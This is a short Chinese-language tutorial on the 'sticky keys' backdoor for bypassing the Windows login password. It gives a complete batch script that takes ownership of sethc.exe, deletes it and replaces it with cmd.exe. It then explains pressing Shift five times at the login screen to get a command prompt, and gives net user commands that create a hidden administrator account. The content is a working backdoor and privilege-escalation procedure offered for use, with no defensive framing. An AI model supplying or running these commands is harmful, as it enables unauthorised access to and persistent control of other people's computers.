shift后门,绕过windows开机密码
的有关信息介绍如下:通过shift后门,直接在开机界面绕过windows开机密码
创建bat文件
编写以下代码
@echo off
c:
cd\
cd Windows\System32
takeown /f sethc.exe /a
icacls sethc.exe /grant Administrator:f
del sethc.exe
copy cmd.exe sethc.exe
pause&&exit
保存退出
运行bat
在登陆界面连续按shift五次,cmd就会弹出来。
在dos命令运行以下代码创建账号
创建账号: net user temp /add
提权: net localgroup Administrators temp /add
随后重启,就会出现temp的用户,点击登陆进去就可以了。
删除用户: net user temp /del